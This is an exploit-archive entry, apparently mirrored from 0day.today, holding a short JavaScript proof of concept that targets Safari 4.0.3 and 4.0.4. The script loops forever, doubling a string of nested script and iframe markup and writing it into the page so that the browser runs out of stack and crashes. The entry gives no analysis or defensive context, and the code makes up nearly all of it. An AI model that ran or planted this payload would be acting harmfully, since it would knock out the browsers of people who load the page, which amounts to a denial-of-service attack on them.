id: 12040
date: 04/28/2010
title: Safari 4.0.3 & 4.0.4 Stack Exhaustion
author: n/a
cves: 

=====================================
Safari 4.0.3 & 4.0.4 Stack Exhaustion
=====================================

<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 - Other versions might be vulnerable aswell.
  a="<script>var b=\"<iframe src='javascript:window.location=\"boom\"'></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
  while(1){
    a=a+a;
    document.write(a);
  }
</script>



#  0day.today [2023-03-22]  #